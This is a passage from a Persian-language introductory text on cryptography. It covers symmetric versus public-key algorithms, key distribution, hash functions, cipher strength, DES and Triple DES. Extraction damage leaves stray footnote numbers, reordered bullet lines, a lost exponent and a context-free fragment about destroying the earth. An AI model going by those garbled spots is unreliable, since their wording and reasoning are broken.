ﺳﺎﺩﮔﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ٧٤ﻛﻪ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻧﺪﺍﺭﻧﺪ ﺍﺷﺘﺒﺎﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ .ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ
ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺩﻭ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻧﻤﻮﺩ :ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺑﻠﻮﻙ ،٧٥ﻭ ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺟﺎﺭﻱ .٧٦ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺑﻠﻮﻙ ،ﺩﺍﺩﻩﻫﺎﻱ ﻳـﻚ
ﺑﻠﻮﻙ )ﺗﻌﺪﺍﺩﻱ ﺑﺎﻳﺖ( ﺭﺍ ﺩﺭ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺟﺎﺭﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ )ﻳﺎ ﺣﺘﻲ ﺑﻴـﺖ ﺑـﻪ ﺑﻴـﺖ(
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻮﺗـﻮﺭ ﻣﺤﺮﻛـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣـﺪﺭﻥ ﻫـﺴﺘﻨﺪ .ﺍﻳـﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ ﻋﻤﻮﻣـﹰﺎ ﺑـﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ ﺍﺯ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﻤﺎﺑﻴﺶ ﭘﻴﺎﺩﻩﺳﺎﺯﻱﺷﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺳﻪ ﻣـﺸﻜﻞ
ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ:
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺑﻪ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺑﭙﺮﺩﺍﺯﻧـﺪ، •
ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻨﺪ .ﻣﺒﺎﺩﻟﻪ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﻬﺎ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﻛﻨﻨﺪ ،ﻫﺮ ﺩﻭ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﺭﺍ ﻧـﺰﺩ ﺧـﻮﺩ ﺩﺍﺷـﺘﻪ •
ﺑﺎﺷﻨﺪ ﻭ ﺁﻧﺮﺍ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻧﺪ .ﺍﮔﺮ ﻛﻠﻴﺪ ﻳﻜﻲ ﺍﺯ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﻣﺨﺪﻭﺵ ﺷﻮﺩ ﻭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻣﻤﻜﻦ
ﺍﺳﺖ ﻃﺮﻑ ﺩﻭﻡ ﺍﺭﺗﺒﺎﻁ ﺑﺮﺍﻱ ﻃﺮﻑ ﺍﻭﻝ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﺪ -ﻭ ﺁﻧﮕﺎﻩ ﺁﻥ ﭘﻴﺎﻡ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺨﺪﻭﺵﺷﺪﻩ ﻣـﻮﺭﺩ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ.
ﺍﮔﺮ ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﻳﻞ ﺑﺎﺷﻨﺪ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻫﺮ ﺍﺭﺗﺒﺎﻁ ﺩﻭﻧﻔﺮﻩ ﺑـﻪ ﻳـﻚ ﻛﻠﻴـﺪ ﺭﻣـﺰ •
ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ،ﻛﻪ ﺍﻳﻦ ﺑﺮﺍﻱ Nﻛﺎﺭﺑﺮ ﻣﺘﻔﺎﻭﺕ ﻣـﺴﺘﻠﺰﻡ (N2 - N) / 2ﻛﻠﻴـﺪ ﻣـﻲﺷـﻮﺩ .ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺗﻌـﺪﺍﺩ
ﻛﺎﺭﺑﺮﺍﻥ ،ﺍﻳﻦ ﻋﺪﺩ ﺑﺴﺮﻋﺖ ﻏﻴﺮﻗﺎﺑﻞ ﻛﻨﺘﺮﻝ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ،ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﻭ ﻟﺬﺍ ﺳﺎﻳﺮﻳﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﻨﺎﻇﺮ ﺍﺯ ﺻﺤﺖ ﺍﻣﻀﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﺮﻫﺰﻳﻨﻪ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻋﻤﻞ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕـﺎﻧﻲ ﺑـﻪ
ﻗﺪﺭﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ۱۰۰۰ﺑﺮﺍﺑﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻌﺎﺩﻝ ﺧﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻭ ﻧﻴـﺰ
ﺍﺯ ﺳﺮﻋﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺩﺭ ﻭﺍﻗـﻊ ﺍﺯ ﻳـﻚ ﺗﺮﻛﻴـﺐ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ:
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ
ﻳﻚ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻳﻚ ﺍﻟﮕﻮﻱ ﺑﻪ ﻇﺎﻫﺮ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺑﻴﺘﻬﺎ ﺑﺮﺍﻱ ﻫﺮ ﻭﺭﻭﺩﻱ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ .ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪ ﺑﻪ ﻧﺤﻮﻱ ﻣﺤﺎﺳﺒﻪ ﻣـﻲﺷـﻮﺩ
ﻛﻪ ﻳﺎﻓﺘﻦ ﻳﻚ ﻭﺭﻭﺩﻱ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﻳﻚ ﺧﻼﺻﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﺒﺎﺷﺪ .ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻏﺎﻟﺒﹰﺎ "ﺍﺛﺮ ﺍﻧﮕﺸﺖ
ﻓﺎﻳﻠﻬﺎ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ .ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ،ﺑﻪ ﺟﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺻﻠﻲ ﻓﺎﻳﻞ ،ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ.
ﻻ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳـﺎ ﺣـﺪﺱ ﺯﺩﻥ ﻣﺸﻜﻞ ﺑﻮﺩﻥ ﺍﻣﻜﺎﻥ ﺣﺪﺱ ﻛﻠﻴﺪ ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﺯﻣﺎﻳﺶ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ﻣﻤﻜﻦ )ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﺭﻣﺰ( .ﻣﻌﻤﻮ ﹰ •
ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﻃﻮﻻﻧﻲﺗﺮ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ؛
ﺩﺷﻮﺍﺭ ﺑﻮﺩﻥ ﻣﻌﻜﻮﺱ ﻛﺮﺩﻥ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ )ﺷﻜﺴﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ(؛ •
ﻋﺪﻡ ﻭﺟﻮﺩ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ،ﻳﺎ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻳﻚ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺁﺳـﺎﻧﺘﺮ •
ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ؛
ﻧﺎﻣﻤﮑﻦ ﺑﻮﺩﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻳﻚ ﭘﻴﺎﻡ ﻛﻪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺍﻧﻴﺪ ﭼﮕﻮﻧﻪ ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷـﻮﺩ •
)ﻛﻪ ﺣﻤﻠﻪ ﻣﺘﻦ ﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ٨٠ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ(؛ ﻭ
ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﮔﺮ ﻫﻤﺔ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﺷـﺪﻩ ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺧﺼﻮﺻﻴﺎﺕ "ﻣﺘﻦ ﺳﺎﺩﻩ" ﻭ ﺩﺍﻧﺶ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﻥ ﺧﺼﻮﺻﻴﺎﺕ ،ﻣﺜ ﹰ •
ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺎ ﻳﻚ ﻗﻄﻌﻪ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ "ﻣﺘﻦﺳﺎﺩﻩ" ﺷﺮﻭﻉ ﺷﻮﺩ ﻳﺎ ﺧﺎﺗﻤﻪ ﻳﺎﺑﺪ ،ﺁﻥ ﺳﻴﺴﺘﻢ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ.
ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺍﺳﺘﺤﻜﺎﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺛﺒﺎﺕ ﻧﻤﻲﺷﻮﺩ؛ ﺑﻠﻜﻪ ﺗﻨﻬﺎ ﺭﺩ ﻣﻲﺷﻮﺩ .ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳﺪ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ،ﻣﺒﺘﻜـﺮ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻴﺸﻪ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺍﺳﺖ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﺓ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﺍﺳﺖ -ﻳﻌﻨﻲ ﻣﺒﺘﻜﺮ ﻣﻌﺘﻘـﺪ ﺍﺳـﺖ ﻛـﻪ ﺭﺍﻫـﻲ ﺑـﺮﺍﻱ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺮﺑﻮﻃﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﭼﺮﺍ ﻛﻪ ﺍﮔﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻧﻘـﺺ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩ
ﻻ ﻣﺒﺘﻜﺮ ﺩﺭ ﻭﺣﻠﻪ ﺍﻭﻝ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑﺎ ﺧﻴﺎﻝ ﺁﺳﻮﺩﻩ ﺁﻧﺮﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ(
ﺑﺎﺷﺪ ،ﺍﺻﻮ ﹰ
ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﺑﺮﺭﺳﻲ ﺍﺳﺘﺤﻜﺎﻡ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ،ﻳﻚ ﺭﻳﺎﺿﻴﺪﺍﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﺍﻟﮕﻮﺭﺗﻴﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻧـﻮﺍﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺣﻤـﻼﺕ
ﻼ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﻧﻘﺎﻳﺺ ﺳﺎﻳﺮ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ ﻣﻘﺎﻭﻡ ﺍﺳﺖ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻫﻤـﺔ ﺣﻤـﻼﺕﻛﻪ ﻗﺒ ﹰ
ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻫﻢ ﺍﻟﺰﺍﻣﹰﺎ ﺍﻳﻤﻦ ﻧﻴﺴﺖ ،ﭼﺮﺍﻛﻪ ﺑﻄﻮﺭ ﻣﺘﻮﺍﻟﻲ ﺍﻧﻮﺍﻉ ﺟﺪﻳﺪ ﺣﻤﻼﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ.
ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺧﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﻳﺎ ﻣﺆﺳﺴﺎﺕ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﺗﺮﻱ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ
ﻣﻮﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺍﻧﺪ .ﻋﻤﻮﻣﹰﺎ ﻧﺒﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺍﺩﻋﺎﻫﺎ ﺯﻳﺎﺩ ﺍﺳﺘﻘﺒﺎﻝ ﻛﺮﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻣـﺮﻭﺯﻩ ﻫـﻴﭻ ﺣﻤﻠـﺔ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩﺍﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ ،ﺩﻟﻴﻠﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ
ﻭ ﺁﺯﻣﻮﻥﻧﺸﺪﻩ -ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﻧﻘﺎﻳﺺ ﭘﻨﻬﺎﻥ ﺑﺎﺷﻨﺪ -ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺯﻣﻴﻦ ﺭﺍ ﻧﺎﺑﻮﺩ ﺧﻮﺍﻫﺪ ﻛﺮﺩ -ﻭ ﺑﺎ ﻓﺮﺽ ﺍﻳﻨﻜﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺿﻌﻒ ﺩﻳﮕﺮﻱ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ -ﻳـﻚ
ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ۱۲۸ﺑﻴﺘﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﻏﻠﺐ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺎﻓﻲ ﺑﺎﺷﺪ!
DES
٨٣
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩ ) (DESﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ۱۹۷۷ﻭ ﺑﺼﻮﺭﺕ ﻳﻚ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ANSIﺩﺭ
ﺳﺎﻝ ۱۹۸۱ﺍﻧﺘﺨﺎﺏ ﺷﺪ ،ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻠﻮﮐﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ۵۶ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺑـﻪ ﭼـﻪ
ﻣﻨﻈﻮﺭﻱ ﺑﻜﺎﺭ ﺭﻭﺩ ﺩﺍﺭﺍﻱ ﭼﻨﺪ ﺣﺎﻟﺖ ﻋﻤﻠﻜﺮﺩﻱ ﻣﺨﺘﻠﻒ ﻣﻲﺑﺎﺷﺪ DES .ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻗﻮﻱ ﺍﺳﺖ ،ﺍﻣﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﻛﻮﺗﺎﻫﺶ ﻛﺎﺭﺑﺮﺩ ﺣﺎﻝ
ﺣﺎﺿﺮ ﺁﻧﺮﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻫـﺪﻑ ﺍﺧﺘـﺼﺎﺻﻲ ﺷﻜـﺴﺘﻦ ﺭﻣـﺰ DESﺗﻮﺳـﻂ ﺑﻨﻴـﺎﺩ ﻃﻼﻳـﻪﺩﺍﺭﺍﻥ
ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ) ٨٤(EFFﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﺍﺯ ۲۵۰۰۰ﺩﻻﺭ ﺳﺎﺧﺘﻪ ﺷﺪ ﻭ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳﺶ ﻋﻤﻮﻣﻲ ،ﻛﻠﻴﺪ ﺭﻣـﺰ ﻳـﻚ ﭘﻴـﺎﻡ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺩﺭ
ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺭﻭﺯ ﺩﺭ ﺑﺮﺍﺑﺮ ﭼﺸﻤﺎﻥ ﺍﻋﻀﺎﻱ ﺍﺋﺘﻼﻑ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﭘﻴﺪﺍ ﻛﺮﺩ.
٨٥
DESﺳﻪﮔﺎﻧﻪ
DESﺳﻪﮔﺎﻧﻪ ﺭﻭﺷﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺳﻪ ﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ DESﻭ ﺳﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ ﻛﻪ ﺟﻤﻌﹰﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﺑـﻪ
۱۶۸ﺑﻴﺖ ﻣﻲﺭﺳﺎﻧﺪ DES ،ﺭﺍ ﺑﻄﻮﺭ ﭼﺸﻤﮕﻴﺮﻱ ﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ " "3DESﻣﻮﺳـﻮﻡ ﺍﺳـﺖ ﺩﺭ ﻣﻘﻴـﺎﺱ
